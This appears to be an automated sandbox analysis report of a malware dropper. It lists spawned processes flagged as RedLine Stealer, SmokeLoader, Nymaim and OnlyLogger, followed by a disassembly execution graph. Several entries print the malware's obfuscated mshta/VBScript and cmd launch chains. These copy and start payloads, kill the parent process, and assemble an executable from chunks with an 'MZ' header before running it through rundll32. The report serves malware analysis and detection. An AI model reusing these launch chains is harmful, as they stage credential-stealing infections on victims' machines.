                                      MD5 hash:B6B87E674629A0F112CB1283B0322CCB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 81%, ReversingLabs
                                      Has exited:true

                                      Target ID:26
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon1785436ae78.exe /mixone
                                      Imagebase:0x400000
                                      File size:449'024 bytes
                                      MD5 hash:0FC8BA6DE4099DDC991EADE9B86A6F06
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_onlyLogger, Description: Yara detected onlyLogger, Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_onlyLogger, Description: Yara detected onlyLogger, Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_OnlyLogger, Description: Detects OnlyLogger loader variants, Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_onlyLogger, Description: Yara detected onlyLogger, Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_OnlyLogger, Description: Detects OnlyLogger loader variants, Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.4154343968.0000000001A2F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Has exited:false

                                      Target ID:28
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe
                                      Wow64 process (32bit):false
                                      Commandline:Mon1795d04d4bd.exe
                                      Imagebase:0x260000
                                      File size:64'000 bytes
                                      MD5 hash:D082843D4E999EA9BBF4D89EE0DC1886
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 81%, ReversingLabs
                                      Has exited:true

                                      Target ID:29
                                      Start time:04:57:04
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe
                                      Wow64 process (32bit):true
                                      Commandline:Mon179e1058f256.exe
                                      Imagebase:0x400000
                                      File size:439'808 bytes
                                      MD5 hash:ECC773623762E2E326D7683A9758491B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.4147517573.0000000000400000.00000040.00000001.01000000.0000001A.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001D.00000002.4153571482.00000000017F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000003.1777699508.0000000003140000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 84%, ReversingLabs
                                      Has exited:false

                                      Target ID:30
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                                      Imagebase:0x4d0000
                                      File size:442'368 bytes
                                      MD5 hash:5721981400FAF8EDB9CB2FA1E71404A2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      Has exited:false

                                      Target ID:32
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                                      Imagebase:0x3e0000
                                      File size:432'128 bytes
                                      MD5 hash:B6B87E674629A0F112CB1283B0322CCB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      Has exited:false

                                      Target ID:33
                                      Start time:04:57:06
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\mshta.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                      Imagebase:0x830000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:04:57:08
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:04:57:08
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:04:57:10
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:04:57:11
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      Wow64 process (32bit):true
                                      Commandline:9xU.EXE -pPtzyIkqLZoCarb5ew
                                      Imagebase:0x720000
                                      File size:1'229'031 bytes
                                      MD5 hash:7C6B2DC2C253C2A6A3708605737AA9AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Has exited:true

                                      Target ID:39
                                      Start time:04:57:11
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                      Wow64 process (32bit):true
                                      Commandline:taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                                      Imagebase:0x200000
                                      File size:74'240 bytes
                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:04:57:12
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\mshta.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                      Imagebase:0x830000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:04:57:12
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:04:57:12
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:04:57:13
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                      Imagebase:0x7ff6eef20000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:04:57:15
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:04:57:17
                                      Start date:21/08/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff72b770000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                      Has exited:false

                                      Target ID:48
                                      Start time:04:57:17
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 864
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:04:57:17
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\mshta.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                      Imagebase:0x830000
                                      File size:13'312 bytes
                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 872
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:04:57:18
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\control.exe
                                      Wow64 process (32bit):true
                                      Commandline:control .\R6f7sE.I
                                      Imagebase:0x820000
                                      File size:149'504 bytes
                                      MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:04:57:19
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                      Imagebase:0x490000
                                      File size:61'440 bytes
                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Yara matches:
                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000039.00000002.1968824084.0000000005240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:59
                                      Start time:04:57:20
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 900
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:04:57:22
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 1064
                                      Imagebase:0x950000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:11.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.6%
                                        Total number of Nodes:1386
                                        Total number of Limit Nodes:16
                                        execution_graph 3222 4015c1 3242 402d3e 3222->3242 3226 401631 3228 401663 3226->3228 3229 401636 3226->3229 3232 401423 24 API calls 3228->3232 3258 401423 3229->3258 3237 40165b 3232->3237 3236 40164a SetCurrentDirectoryW 3236->3237 3238 4015d1 3238->3226 3239 4015fa 3238->3239 3240 401617 GetFileAttributesW 3238->3240 3254 405e3e 3238->3254 3262 405b0d 3238->3262 3270 405af0 CreateDirectoryW 3238->3270 3239->3238 3265 405a73 CreateDirectoryW 3239->3265 3240->3238 3243 402d4a 3242->3243 3273 406579 3243->3273 3246 4015c8 3248 405ebc CharNextW CharNextW 3246->3248 3249 405ed9 3248->3249 3252 405eeb 3248->3252 3251 405ee6 CharNextW 3249->3251 3249->3252 3250 405f0f 3250->3238 3251->3250 3252->3250 3253 405e3e CharNextW 3252->3253 3253->3252 3255 405e44 3254->3255 3256 405e5a 3255->3256 3257 405e4b CharNextW 3255->3257 3256->3238 3257->3255 3311 4055a4 3258->3311 3261 40653c lstrcpynW 3261->3236 3322 406931 GetModuleHandleA 3262->3322 3266 405ac0 3265->3266 3267 405ac4 GetLastError 3265->3267 3266->3239 3267->3266 3268 405ad3 SetFileSecurityW 3267->3268 3268->3266 3269 405ae9 GetLastError 3268->3269 3269->3266 3271 405b00 3270->3271 3272 405b04 GetLastError 3270->3272 3271->3238 3272->3271 3277 406586 3273->3277 3274 4067d1 3275 402d6b 3274->3275 3306 40653c lstrcpynW 3274->3306 3275->3246 3290 4067eb 3275->3290 3277->3274 3278 40679f lstrlenW 3277->3278 3280 406579 10 API calls 3277->3280 3283 4066b4 GetSystemDirectoryW 3277->3283 3284 4066c7 GetWindowsDirectoryW 3277->3284 3285 4067eb 5 API calls 3277->3285 3286 406579 10 API calls 3277->3286 3287 406742 lstrcatW 3277->3287 3288 4066fb SHGetSpecialFolderLocation 3277->3288 3299 40640a 3277->3299 3304 406483 wsprintfW 3277->3304 3305 40653c lstrcpynW 3277->3305 3278->3277 3280->3278 3283->3277 3284->3277 3285->3277 3286->3277 3287->3277 3288->3277 3289 406713 SHGetPathFromIDListW CoTaskMemFree 3288->3289 3289->3277 3297 4067f8 3290->3297 3291 40686e 3292 406873 CharPrevW 3291->3292 3294 406894 3291->3294 3292->3291 3293 406861 CharNextW 3293->3291 3293->3297 3294->3246 3295 405e3e CharNextW 3295->3297 3296 40684d CharNextW 3296->3297 3297->3291 3297->3293 3297->3295 3297->3296 3298 40685c CharNextW 3297->3298 3298->3293 3307 4063a9 3299->3307 3302 40643e RegQueryValueExW RegCloseKey 3303 40646e 3302->3303 3303->3277 3304->3277 3305->3277 3306->3275 3308 4063b8 3307->3308 3309 4063c1 RegOpenKeyExW 3308->3309 3310 4063bc 3308->3310 3309->3310 3310->3302 3310->3303 3312 4055bf 3311->3312 3320 401431 3311->3320 3313 4055db lstrlenW 3312->3313 3314 406579 17 API calls 3312->3314 3315 405604 3313->3315 3316 4055e9 lstrlenW 3313->3316 3314->3313 3318 405617 3315->3318 3319 40560a SetWindowTextW 3315->3319 3317 4055fb lstrcatW 3316->3317 3316->3320 3317->3315 3318->3320 3321 40561d SendMessageW SendMessageW SendMessageW 3318->3321 3319->3318 3320->3261 3321->3320 3323 406957 GetProcAddress 3322->3323 3324 40694d 3322->3324 3325 405b14 3323->3325 3328 4068c1 GetSystemDirectoryW 3324->3328 3325->3238 3327 406953 3327->3323 3327->3325 3329 4068e3 wsprintfW LoadLibraryExW 3328->3329 3329->3327 3816 402a42 3830 402d1c 3816->3830 3818 402a48 3819 402a88 3818->3819 3820 402a6f 3818->3820 3826 402925 3818->3826 3823 402aa2 3819->3823 3824 402a92 3819->3824 3821 402a74 3820->3821 3822 402a85 3820->3822 3833 40653c lstrcpynW 3821->3833 3834 406483 wsprintfW 3822->3834 3827 406579 17 API calls 3823->3827 3825 402d1c 17 API calls 3824->3825 3825->3826 3827->3826 